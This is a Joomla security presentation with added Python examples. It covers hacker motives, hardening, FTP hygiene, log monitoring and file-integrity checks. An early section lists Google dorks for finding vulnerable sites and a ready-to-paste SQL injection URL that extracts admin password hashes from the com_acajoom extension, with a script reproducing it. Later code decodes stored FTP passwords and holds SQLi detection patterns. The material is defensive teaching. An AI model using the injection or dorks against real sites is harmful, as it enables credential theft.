Joomla Security
Brendon Hatcher, Technical Director
Photo: flickr.com/photos/carbonnyc
Bare essentials to serious measures
Understanding hackers and hacking
Definitions of “hacker”
Hacker’s motivations
Evidence of hacking
What is a hacker?
Someone who deliberately seeks to bypass a server’s security
– Black, grey, white hats
– A hacked site is a broken/compromised site
A skilled computer programmer
– A hacked site is a tweaked and improved site
A script kiddie
– Junior hacker using other hackers’ tools and techniques
Hacker’s motivations
To see if they can
To create mayhem
For social standing in the sub-culture
For political reasons – hacktivism
For financial reasons
– Theft – steal ebooks, videos, games, online services etc
– Sell data – user profiles, credit card details etc
– Industrial sabotage – paid to break competitor sites
– Set up zombie farms
– Steal bandwidth
– Host phishing pages
– Collect passwords
Evidence of hacking
None! (many compromises leave no visible sign at all)
Site trashed
Hacking message
High bandwidth use
Changed admin password
New user with admin rights
Server logs
Why be concerned about security?
No-one is safe
Hacking is actually quite easy
Fixing hacked sites is tricky
Hacked sites are a big problem
No-one is safe
Type of site – Motivation
Any site – To see if they can; to create mayhem; social standing; post political messages; zombie farms; steal bandwidth; host phishing pages
Any membership site – Sell user profiles to marketers; obtain usernames and passwords
Some ecommerce sites – Sell credit card details to thieves; sell order history and contact details to marketers
Why worry about hacking?
Sites are targeted at random
Hacking is actually quite easy
– Vulnerable sites are easy to find
– Vulnerable sites are easy to hack
Fixing hacked sites is quite tricky
– Hacks can be invisible
– Clients may not notice a hacked site for some time
– Finding a clean backup may be impossible
– Determining what has been done can be really hard
– May be difficult to restore
– Hardening a site to avoid future hacks requires skill and focus
Why worry about hacking?
Hacked sites are a big problem
– Business reputation
– Angry clients
– Site shutdown by host
– Loss of business
– Data theft
Photo: flickr.com/photos/gaetanlee/
Hacking a Joomla site
Is Joomla less secure than other systems?
The site must be vulnerable
3 steps to hacking for fun and profit
Is Joomla less secure than other systems?
Yes and no
Joomla has to strike a balance between security and ease of use
Joomla is an attractive target for hackers
– The critical mass of sites
– Large amateur web developer user base
– Extensions have variable security
The site must be vulnerable
3 steps to hacking for fun and profit
1. Find a vulnerability (and instructions on how to exploit it)
2. Find a vulnerable site
3. Hack the site
Then, sit back and enjoy fame and fortune!
Find a vulnerability
Security sites
– www.exploit-db.com, www.secunia.com
Various hacking sites/forums
Joomla vulnerable extensions list
– docs.joomla.org/Vulnerable_Extensions_List
Find a vulnerable site
Google Dork – a search phrase to find vulnerable sites
PHPInfo
– intitle:phpinfo()
Vulnerable extensions
– allinurl:com_acajoom
Cut and paste hack code (host name masked). The value of mailingid goes straight into the component’s SQL query, so the UNION SELECT appended to it returns username:password pairs from the jos_users table:
http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*
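The following is an added example, not part of the presentation and not Acajoom’s code: a miniature of the pattern the dork above exploits, run against an in-memory SQLite database so it works offline. The jos_ prefix and the users table come from the payload; the mailing table, its columns and the placeholder password hash are assumptions made so there is a query to inject into. The injected tail is rewritten in SQLite syntax (username||':'||password instead of MySQL’s concat(username,0x3a,password), no /**/ comments), and the block also shows why renaming the jos_ prefix breaks a cut-and-paste payload.

```python
import sqlite3

# Constructed stand-in for the relevant slice of a Joomla 1.5 database. The jos_
# prefix and the users table match the payload on the slide; the mailing table and
# its columns are an assumption chosen so the example has a query to inject into.
def build_db(prefix="jos_"):
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE {prefix}users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO {prefix}users VALUES (62, 'admin', '0123456789abcdef0123456789abcdef:salt');
        CREATE TABLE {prefix}mailing (id INTEGER, subject TEXT, body TEXT);
        INSERT INTO {prefix}mailing VALUES (1, 'Newsletter 1', 'Hello subscribers');
    """)
    return db

def view_mailing_vulnerable(db, mailingid, prefix="jos_"):
    """The bug behind the dork: the request parameter is pasted into the SQL text."""
    sql = f"SELECT subject, body FROM {prefix}mailing WHERE id = {mailingid}"
    return db.execute(sql).fetchall()

def view_mailing_safe(db, mailingid, prefix="jos_"):
    """The fix: enforce the expected type, then bind the value instead of splicing it."""
    try:
        mid = int(mailingid)
    except (TypeError, ValueError):
        raise ValueError("mailingid must be an integer")
    sql = f"SELECT subject, body FROM {prefix}mailing WHERE id = ?"
    return db.execute(sql, (mid,)).fetchall()

# The tail of the dork, rewritten for SQLite. Two selected columns because the
# vulnerable query returns two: a UNION only works when the column counts line up,
# which is why the original payload pads with a long run of 1s.
PAYLOAD = "1 UNION SELECT 1, username||':'||password FROM jos_users"

def run_attack(prefix="jos_"):
    """Send the payload through the vulnerable handler. Returns the rows the attacker
    sees, or the database error text if the injection misfires."""
    db = build_db(prefix)
    try:
        return view_mailing_vulnerable(db, PAYLOAD, prefix)
    except sqlite3.OperationalError as exc:
        return str(exc)

def leaked_logins(rows):
    """The smuggled username:hash strings: rows whose first column is the padding 1."""
    return [value for first, value in rows if first == 1]

if __name__ == "__main__":
    rows = run_attack()
    print("vulnerable handler returned:", rows)
    print("leaked:", leaked_logins(rows))
    print("same payload against a renamed prefix:", run_attack("j7x_"))
    try:
        view_mailing_safe(build_db(), PAYLOAD)
    except ValueError as exc:
        print("parameterised handler rejected it:", exc)
```

The renamed-prefix run fails with “no such table: jos_users”, which is exactly the protection the “avoid the obvious” advice later in this deck buys: it stops copy-paste attackers, not someone willing to enumerate table names, so it complements a parameterised query rather than replacing it.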
Photo: flickr.com/photos/tawheedmanzoor
Security action plan
Web sites are like onions
Levels of security
Web development tools
Strong, unique passwords everywhere
Continuous attention
Web sites are like onions
Server operating system
Apache
PHP + MySQL
Joomla
Extensions
Users and their behaviour
Levels of security
[1] Basic actions
[2] More complex actions
[3] Actions that require significant modification rights on the server (unless already implemented by default)
Image by echiner1
Web development tools
WHM – server administration
cPanel – hosting account administration
FileZilla – FTP app
KeePass – password vault
General advice
Strong, unique passwords everywhere
– A password vault removes the need to fall back on a single, simple password
Continuous attention needed
Creating a safe home for Joomla
Shared, VPS or dedicated servers?
Apache
PHP
MySQL
Shared, VPS or dedicated servers?
A shared server
– Your site(s) live in the same hosting space as other sites that you do not administer
– This is the cheapest hosting option
– No say over the security of the other sites on the server
– An old shared server is the worst location for your hosting
A Virtual Private Server
– Better than shared
– Still can’t change many settings
A dedicated server
– Still a “shared” server
– Allows you to upgrade and tweak all the settings on a dedicated server
– Host retains responsibility for maintenance
Additional security
Suhosin – hardens PHP
Samhain or Tripwire – file integrity monitoring (alerts when files on the server change)
ConfigServer firewall (CSF)
Apache
[3] suExec
– CGI scripts run under the user of the website instead of the Apache user
[3] mod_security
– Intrusion detection and prevention engine
PHP
[2] PHP5, not PHP4
[3] suPHP
– PHP files are run under the user of the website instead of the Apache user
Globally reset all files (run from the Joomla root)
– Owner – AccountUsername:AccountUsername
chown -R AccountUsername:AccountUsername .
– Files – 644
find . -type f -exec chmod 644 {} \;
– Folders – 755
find . -type d -exec chmod 755 {} \;
– Use . rather than * as the target: a shell glob of * skips dot-files such as .htaccess
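An added example (not from the presentation) doing the same reset in Python, with the two checks a practitioner wants around it: a world-writable audit to run first, and a report of what actually changed. It deliberately walks dot-files and skips symlinks; ownership is left to chown because that needs root. The locked-file list (configuration.php at 444) is an assumption based on common Joomla practice, and the sample tree is constructed in a temp directory so the block is safe to run anywhere.

```python
import os
import stat
import tempfile

# Files to pin to a stricter mode than the 644 default. Leaving configuration.php
# read-only after setup is common Joomla practice; treat the list as an assumption
# and adjust it for your install.
LOCKED_FILES = {"configuration.php": 0o444}

def mode_of(path):
    """Permission bits only (no file-type bits), without following symlinks."""
    return stat.S_IMODE(os.lstat(path).st_mode)

def find_world_writable(root):
    """Paths (relative to root) that anyone on the box can write to. Run this first:
    on a shared or old server it is the quickest way to see how exposed you are."""
    hits = set()
    for dirpath, dirnames, filenames in os.walk(root):
        for full in [dirpath] + [os.path.join(dirpath, n) for n in dirnames + filenames]:
            if not os.path.islink(full) and mode_of(full) & stat.S_IWOTH:
                hits.add(os.path.relpath(full, root))
    return sorted(hits)

def reset_permissions(root, file_mode=0o644, dir_mode=0o755, locked=LOCKED_FILES):
    """Equivalent of the find/chmod one-liners on the slide, with two differences:
    it visits dot-files too (a shell glob of * silently skips .htaccess), and it leaves
    symlinks alone because chmod on a link changes whatever the link points at.
    Returns {relative_path: new_mode} for everything it changed."""
    changed = {}

    def fix(full, mode):
        if os.path.islink(full):
            return
        if mode_of(full) != mode:
            os.chmod(full, mode)
            changed[os.path.relpath(full, root)] = mode

    fix(root, dir_mode)
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            fix(os.path.join(dirpath, d), dir_mode)
        for f in filenames:
            fix(os.path.join(dirpath, f), locked.get(f, file_mode))
    return changed

def modes_under(root):
    """{relative_path: mode} for root and everything below it, for reporting."""
    out = {".": mode_of(root)}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                out[os.path.relpath(full, root)] = mode_of(full)
    return out

def make_sample_tree():
    """Constructed scratch copy of a Joomla root with the sloppy modes an uploader or
    a previous developer leaves behind. Lives in the temp directory."""
    root = tempfile.mkdtemp(prefix="joomla_perms_")
    for d in ("administrator", "components/com_example", "images"):
        os.makedirs(os.path.join(root, d))
    sloppy = {"index.php": 0o777, ".htaccess": 0o666, "configuration.php": 0o664,
              "images/logo.png": 0o600, "components/com_example/example.php": 0o755}
    for rel, mode in sloppy.items():
        full = os.path.join(root, rel)
        open(full, "w").close()
        os.chmod(full, mode)
    os.chmod(os.path.join(root, "administrator"), 0o777)
    return root

if __name__ == "__main__":
    root = make_sample_tree()
    print("world-writable before:", find_world_writable(root))
    for path, mode in sorted(reset_permissions(root).items()):
        print(f"{path}: {mode:o}")
    print("world-writable after:", find_world_writable(root))
```

Run it a second time and it reports nothing changed, which makes it safe to schedule as a periodic check rather than a one-off.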
Hosting account .htaccess files
– [1] Activate the .htaccess file in the Joomla root (rename the htaccess.txt that ships with Joomla to .htaccess)
– [1] Use an .htpasswd for the /administrator/ folder
– [3] Advanced .htaccess files
– A LOT more important detail in the manual
Securing a Joomla site
Keeping up to date
Avoiding the obvious
Hide, and be very, very quiet
Spam form submissions
Install sh404SEF
Keeping up to date
Must update Joomla core and extensions
Remove unused extensions
Avoiding the obvious
[1] The default database table prefix is jos_
[1] The default admin username is admin
[1] The default admin user ID is 62
[1] Change the administrator access URL
Hide, and be very, very quiet
[1] SEF all URLs
[1] Clear the default Joomla metatags
[1] Clear the default Home page title
[1] Remove the generator tag
[1] Change the favicon
[2] Hide component credits
Spam form submissions
Trying to inject spam content onto your site
Targets Joomla core forms and extension forms
Install a captcha system
Install sh404SEF
SEF URLs hide from Google Dorks
Flood control
Other security settings
Creating a safe working environment
PC vulnerability to hacks
FTP access hacks
A note about users
“Burglar bars, electric fences, alarms… and a key left under the doormat”
PC vulnerability to hacks
[1] Install all operating system patches
[1] Install all application patches
[1] Run comprehensive real-time protection apps
[1] Install Secunia PSI
[1] Secure your PC login
[1] Secure your backup storage
[2] Use a secure web browser
FTP access hacks
If a hacker can obtain your FTP password, they can log in as you, bypassing almost every security barrier.
– FTP passwords are stored unencrypted in your FTP program!
– FTP authentication details pass unencrypted to the server!
– There are several common FTP apps that store their passwords in a standard location with a standard name!
FTP configuration
[1] cPanel setup
– Make sure that the FTP password is strong
[1] PC setup
– Password vault (LastPass, KeePass) to store the strong password
– Make sure passwords are not stored anywhere else (including on a Post-It note on the side of the PC)
[1] FileZilla
– Copy all passwords to the password vault
– Delete all passwords from the Site Manager
– Set FileZilla to run in Kiosk mode
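An added example, not from the presentation, that makes the “stored unencrypted” point concrete and doubles as the check that the Site Manager is really empty afterwards. It parses a constructed sitemanager.xml written in the layout FileZilla 3 uses as I recall it (an assumption: the real file lives at ~/.config/filezilla/sitemanager.xml on Linux and %APPDATA%\FileZilla\sitemanager.xml on Windows; Protocol 0 is plain FTP and 1 is SFTP). The base64 in the Pass element is an encoding, not encryption, which the audit demonstrates by recovering the password.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample in the sitemanager.xml layout of FileZilla 3 (assumption, from
# memory). The password is a made-up value; nothing here is a real credential.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.10.0" platform="*nix">
  <Servers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>acct</User>
      <Pass encoding="base64">U3VwZXJTZWNyZXQxMjM=</Pass>
      <Name>client site (ftp)</Name>
    </Server>
    <Server>
      <Host>sftp.example.invalid</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>acct</User>
      <Name>client site (sftp, password asked each time)</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

# Numeric protocol codes as I recall them from FileZilla (assumption).
PROTOCOL_NAMES = {"0": "FTP (cleartext)", "1": "SFTP"}

def audit_sitemanager(xml_text):
    """One finding per saved site: whether a password is stored, what it decodes to,
    and whether the transport would send the credentials in the clear."""
    findings = []
    for server in ET.fromstring(xml_text).iter("Server"):
        proto = (server.findtext("Protocol") or "0").strip()
        pass_el = server.find("Pass")
        password = None
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                # base64 is reversible by anyone who can read the file
                password = base64.b64decode(pass_el.text.strip()).decode("utf-8", "replace")
            else:
                password = pass_el.text  # older releases wrote the password as-is
        findings.append({
            "name": server.findtext("Name") or "?",
            "host": server.findtext("Host") or "?",
            "protocol": PROTOCOL_NAMES.get(proto, "other (" + proto + ")"),
            "password_stored": password is not None,
            "recovered_password": password,
            "cleartext_transport": proto == "0",
        })
    return findings

def needs_attention(findings):
    """Site names still breaking the checklist: a saved password, or plain FTP."""
    return [f["name"] for f in findings
            if f["password_stored"] or f["cleartext_transport"]]

if __name__ == "__main__":
    results = audit_sitemanager(SAMPLE_SITEMANAGER)
    for f in results:
        print(f"{f['name']}: {f['protocol']}, password stored: {f['password_stored']}")
    print("fix these:", needs_attention(results))
```

Point the parser at your own sitemanager.xml after clearing the Site Manager: an empty needs_attention() list is the result you want, and any FTP (cleartext) entry is the case for the “SFTP only” setting at the WHM level.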
FTP configuration
[2] Joomla
– Remove the FTP details from the configuration file
[3] WHM
– Disable FTP access and allow only SFTP access
A note about users
– You should ideally create separate user accounts for each staff member
Preparing for the worst
Site monitoring
A disaster recovery plan
Joomla site backups
Restoring a hacked site
Site monitoring
Diagnostics
– Site down
– Home page content changes
– mod_security logs (show attempts)
– Bandwidth use
– Spam blacklisting
[3] Searching and browsing server logs
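Searching server logs by hand does not scale, so here is an added example (not from the presentation) of the three checks worth automating for a Joomla host: SQL injection attempts like the com_acajoom dork earlier in this deck, phpinfo() probes, and bursts of POSTs to /administrator/ that signal password guessing. The log lines are constructed Apache combined-format entries using RFC 5737 test addresses; the patterns and the burst threshold are my choices, not anything from the talk.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (test addresses, made-up timestamps).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2010:13:55:36 +0200] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2010:13:56:01 +0200] "GET /index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2010:13:56:07 +0200] "GET /phpinfo.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2010:14:02:10 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.0"
198.51.100.7 - - [10/Oct/2010:14:02:11 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.0"
198.51.100.7 - - [10/Oct/2010:14:02:12 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.0"
198.51.100.7 - - [10/Oct/2010:14:02:13 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.0"
198.51.100.7 - - [10/Oct/2010:14:02:14 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.0"
198.51.100.7 - - [10/Oct/2010:14:02:15 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# UNION ... SELECT, a concat() call, or a FROM against any *_users table
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|\bconcat\s*\(|\bfrom\s+\w*_users\b", re.I | re.S)
PROBE_RE = re.compile(r"phpinfo", re.I)

def normalise(path):
    """Undo the two tricks in the dork: URL-encoding, and /**/ comments used as spaces."""
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(path))

def analyse(log_text, login_burst=5):
    """Return a list of alerts; each is {'kind', 'ip', 'detail'}."""
    alerts = []
    admin_posts = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-access line; a real tool would count these
        ip, method, path = m["ip"], m["method"], m["path"]
        clean = normalise(path)
        if SQLI_RE.search(clean):
            alerts.append({"kind": "sqli", "ip": ip, "detail": clean[:80]})
        if PROBE_RE.search(clean):
            alerts.append({"kind": "phpinfo_probe", "ip": ip, "detail": path})
        if method == "POST" and path.startswith("/administrator/"):
            admin_posts[ip] += 1
    for ip, n in admin_posts.items():
        if n >= login_burst:
            alerts.append({"kind": "admin_login_burst", "ip": ip,
                           "detail": f"{n} POSTs to /administrator/"})
    return alerts

def offenders(alerts):
    """Distinct source addresses worth blocking or investigating."""
    return sorted({a["ip"] for a in alerts})

if __name__ == "__main__":
    for a in analyse(SAMPLE_LOG):
        print(a["kind"], a["ip"], a["detail"])
    print("offenders:", offenders(analyse(SAMPLE_LOG)))
```

The normalise() step matters more than the patterns: the dork’s /**/ spacing exists precisely to slip past filters that look for “union select” with a literal space, and the same trick shows up in mod_security evasion.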
Disaster Recovery Plan
Depending on how central your web site is to your business, you may need a DRP
See Tom Canavan’s presentation
– http://www.slideshare.net/coffeegroup/tom-canavan-joomla-security-and-disaster-recovery
Photo: flickr.com/photos/28481088@N00
Joomla site backups
Long-cycle Joomla backups are critical
Redundant backups lead to restful sleep
See my Joomla for Web Developer talk for MUCH more detail
Restoring a hacked site
Fixes the obvious problems
Does not address:
– Hidden hacks
  • Shell scripts
  • Backdoors
  • Zombies
– Continuing vulnerabilities
– Impacts of data exposure
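Finding the hidden hacks listed above is what the Samhain/Tripwire recommendation earlier in the deck is for. The following is an added example, not from the presentation and not either tool’s code: a minimal file-integrity baseline and diff, plus the one heuristic that catches most dropped web shells (a PHP file appearing in a directory that should only hold data). The data-only directory list is an assumption based on a typical Joomla layout; the sample site and the simulated compromise are constructed in a temp directory and the “shell” is inert text.

```python
import hashlib
import os
import tempfile

# Joomla directories that should hold data, not code; a PHP file turning up in one is
# the classic sign of an uploaded web shell. Assumption: adjust to your own layout.
DATA_ONLY_DIRS = ("images", "media", "cache", "tmp", "logs")
CODE_SUFFIXES = (".php", ".phtml", ".php5", ".phar")

def snapshot(root):
    """SHA-256 of every regular file under root, keyed by path relative to root.
    Symlinks are recorded by their target rather than followed."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.islink(full):
                manifest[rel] = "symlink:" + os.readlink(full)
                continue
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest

def compare(baseline, current):
    """Diff two manifests. 'suspicious' is the subset of new or changed files that
    are PHP living where no PHP belongs."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    suspicious = sorted(p for p in added + modified
                        if p.lower().endswith(CODE_SUFFIXES)
                        and p.split("/")[0] in DATA_ONLY_DIRS)
    return {"added": added, "removed": removed, "modified": modified,
            "suspicious": suspicious}

def make_sample_site():
    """Constructed miniature Joomla root in a temp directory."""
    root = tempfile.mkdtemp(prefix="joomla_fim_")
    os.makedirs(os.path.join(root, "images"))
    os.makedirs(os.path.join(root, "components"))
    files = {
        "index.php": b"<?php define('_JEXEC', 1); ?>",
        "configuration.php": b"<?php class JConfig { var $dbprefix = 'jos_'; } ?>",
        "images/logo.png": b"\x89PNG constructed placeholder",
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root

def simulate_compromise(root):
    """What a typical hack leaves behind: a 'shell' dropped in images/ (inert text
    here) and an injected line appended to index.php."""
    with open(os.path.join(root, "images", "thumb.php"), "wb") as fh:
        fh.write(b"<?php /* placeholder standing in for a web shell */ ?>")
    with open(os.path.join(root, "index.php"), "ab") as fh:
        fh.write(b"\n<?php /* injected */ ?>")

def demo():
    """Baseline a clean site, compromise it, and report the difference."""
    root = make_sample_site()
    baseline = snapshot(root)      # take this right after a clean install or update
    simulate_compromise(root)      # and keep it somewhere the web server cannot write
    return compare(baseline, snapshot(root))

if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

Store the baseline manifest off the server (an attacker who can edit index.php can edit a manifest sitting next to it), refresh it after every legitimate update, and treat anything in the suspicious list as a reason to restore from a backup older than the first change rather than to delete the one file you found.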
Photo: flickr.com/photos/andreweason
Credits/Disclaimer
Brendon Hatcher is the compiler of this presentation
The presentation is released under the Creative Commons Licence – Attribution, Non-commercial, No derivatives
If you don’t know what this licence means, go to creativecommons.org
The content is provided without warranty. It is a work in progress and represents my current understanding of Joomla security.